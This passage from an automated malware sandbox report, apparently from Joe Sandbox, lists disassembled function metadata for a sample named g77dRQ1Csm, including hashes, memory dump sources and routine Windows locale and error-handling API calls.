                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B3139B6900609DFDB10CF99C880AAEFBF9FF4C324F15404AE855AB214D771EA45CBA4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00413D9B,?,00000004), ref: 00417537
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                              • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                              • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                              • Opcode ID: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
                                                                                                                                                                                                                              • Instruction ID: 87fd85214f38bea17e9e0867028b4e6f8bd84d2b32a19a69094aa8269c1633f8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0AF0F631740218B7DB11AF61AC01FBE3B72DF04710F90007AFC0926291CA355E60969D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
                                                                                                                                                                                                                              • Instruction ID: 6b6b485e5133a133c3f2fbefddda3f6173d19438d1b1243bf6469fc71b70f41c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2022C71E012299FDF24CFA9C8806ADF7F5EF88314F198569D819EB384D731A952CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: @$@
                                                                                                                                                                                                                              • API String ID: 0-149943524
                                                                                                                                                                                                                              • Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
                                                                                                                                                                                                                              • Instruction ID: f8e17c6c76a6252f05db26a26d0ded41de5b678eb732505d7586c008360bd1d3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2316036184382C7C715CF3CD4B41A2F781FAC936072D43D9E8A18F245D3669446C741
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: @$@
                                                                                                                                                                                                                              • API String ID: 0-149943524
                                                                                                                                                                                                                              • Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
                                                                                                                                                                                                                              • Instruction ID: bacc100dc0a0088e2915408729627ff8f5d38c09acb905e5d4049eb219c2e84e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E314B67144182CBD2049728C8E45B7B781FA8532272DC3FBD091AB7CAD23E9847960C
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3519838083-0
                                                                                                                                                                                                                              • Opcode ID: 651cb6eb15f4b96bd70d515a3bc273186fd9dd4463a1bf7c30f814969f20083e
                                                                                                                                                                                                                              • Instruction ID: 3aa3e24c883bcef65b555e6e5d184397e63da5dbd41a8fa125ab18be998632de
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 651cb6eb15f4b96bd70d515a3bc273186fd9dd4463a1bf7c30f814969f20083e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1C1A171A01A16EFCB14CF24C481AABB7B2FF45304B54416AE842AB781D739FC52DF95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,0316B984,00000000,?,00000008,?,?,03173766,00000000), ref: 0316BBB6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                              • Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
                                                                                                                                                                                                                              • Instruction ID: 412ef274b18d5c4c09428428a174f6e508a4303d34e55e53b12ebabd41cc5d17
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BFB16D311146088FD719CF69C486B65BBE0FF49364F29C658E89ACF2A1C735DAA2CB40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041B71D,?,?,00000008,?,?,004234FF,00000000), ref: 0041B94F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                              • Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
                                                                                                                                                                                                                              • Instruction ID: 77e1d80032caf57d447ccd467e54c4f0879ce58ba2590176158d9b4cb40e0a8d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4B13C71620608DFD715CF28C48ABA57BE0FF45364F298659E999CF3A1C339D982CB84
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03166F80: GetLastError.KERNEL32(?,?,0315E697,?,?,?,0315ED94,?), ref: 03166F84
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _free.LIBCMT ref: 03166FB7
                                                                                                                                                                                                                                • Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FF8
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _abort.LIBCMT ref: 03166FFE
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _free.LIBCMT ref: 03166FDF
                                                                                                                                                                                                                                • Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FEC
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 03170829
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1663032902-0
                                                                                                                                                                                                                              • Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
                                                                                                                                                                                                                              • Instruction ID: 130052ec0222ade4481747999f554da9118da81ca7ed278911ea9e078d02e035
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D21957291030AABDB28EF64DC41BBA73BCEB4C310F1801BAED15DA140EB75E954CB95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004205C2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1663032902-0
                                                                                                                                                                                                                              • Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
                                                                                                                                                                                                                              • Instruction ID: 81f412bf0acab0c669cc413bed1d2c5f28af9b0bc2236bf2d8b3c2af5f6810e7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD21A472A10126AFDB249F25EC41BBB73E8EB84314F50007BE905D6242EB78AD94CB59
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03166F80: GetLastError.KERNEL32(?,?,0315E697,?,?,?,0315ED94,?), ref: 03166F84
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _free.LIBCMT ref: 03166FB7
                                                                                                                                                                                                                                • Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FF8
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _abort.LIBCMT ref: 03166FFE
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 031704CF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                              • Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
                                                                                                                                                                                                                              • Instruction ID: 77b395c3dcd8dd198c2679e93149b79d8edba3f64784eb1292a0109c098bc574
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C11253A6003019FDB18DF39D8A46BAB7A6FF88358B5C442DE98787A40D371B942CB40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 00420268
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                              • Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
                                                                                                                                                                                                                              • Instruction ID: 80b9233af1491a43965ff49f25878bf7386ded64d37c123707e1c04ccab01a49
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E11593A3003058FDB189F79E8955BABBD1FF80358B54442EE94647B01D775AC42CB54
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03166F80: GetLastError.KERNEL32(?,?,0315E697,?,?,?,0315ED94,?), ref: 03166F84
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _free.LIBCMT ref: 03166FB7
                                                                                                                                                                                                                                • Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FF8
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _abort.LIBCMT ref: 03166FFE
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,031707A3,00000000,00000000,?), ref: 03170A31
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2692324296-0
                                                                                                                                                                                                                              • Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
                                                                                                                                                                                                                              • Instruction ID: 04ecd8d6e6be9fa4e317ddfa5000c4d5f120dcf4e52eab6da7e8714702a9d051
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2F0F436A10316AFDB28DA648C05BBAB778EB4C754F1D0469ED09A3140EBB5BE45C6D0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042053C,00000000,00000000,?), ref: 004207CA
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2692324296-0
                                                                                                                                                                                                                              • Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
                                                                                                                                                                                                                              • Instruction ID: 232df0c2e22441a9dd69ecf2977a2312304a26c18b6acff2860949399b437602
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59F04932B00135ABDB285A25E8057BB77E8EB40314F51042BEC05A3641EB78BD41CAE4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03166F80: GetLastError.KERNEL32(?,?,0315E697,?,?,?,0315ED94,?), ref: 03166F84
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _free.LIBCMT ref: 03166FB7
                                                                                                                                                                                                                                • Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FF8
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _abort.LIBCMT ref: 03166FFE
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _free.LIBCMT ref: 03166FDF
                                                                                                                                                                                                                                • Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FEC
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 03170829
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1663032902-0
                                                                                                                                                                                                                              • Opcode ID: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
                                                                                                                                                                                                                              • Instruction ID: 5a3c00381ec82938f5ac5077183bb761d3d1785f87e582802bca49da30d65b42
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11F0A436A51319ABDB14EB64DC51EBA73BCDB4C310F0501B9E906DB240DB74AD4587D4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03166F80: GetLastError.KERNEL32(?,?,0315E697,?,?,?,0315ED94,?), ref: 03166F84
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _free.LIBCMT ref: 03166FB7
                                                                                                                                                                                                                                • Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FF8
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _abort.LIBCMT ref: 03166FFE
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 03170544
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                              • Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
                                                                                                                                                                                                                              • Instruction ID: 2e29a0d9f272d9bfedd7fdfd3da37e9fbf05fca379e94df1a85af4eadd4fac9b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DF0C8763003055FDB24DF799C9067A7BA5EF8879CF1944ADF9468B540D7B1D841CA40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 004202DD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                                                              • Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
                                                                                                                                                                                                                              • Instruction ID: d57b86ad11fc321639f916cdd89717e5b85f45a329514cfdd24aab137e17032f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4CF0F4363003149FDB249E3AE88566A7BD1EB80358B55806FE9418B641D6B59C41CA14
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,03164002,?,00000004), ref: 0316779E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                                                                                              • Opcode ID: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
                                                                                                                                                                                                                              • Instruction ID: 028d06f381818c41a243314780d76b1850f281503ef7fc1de486a5d89bd1495c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4F06D31741718BBDB11EFA0EC05F7E7B66EB08B11F900179BC096A290CB714A249699
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03161C62: RtlEnterCriticalSection.NTDLL(?), ref: 03161C71
                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(004170AB,00000001,00438F98,0000000C), ref: 03167390
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                                                                                              • Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
                                                                                                                                                                                                                              • Instruction ID: 5c4505cb81ab221e61d82363797bd753295a1a525ac1bc094ebb2b4504be66eb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
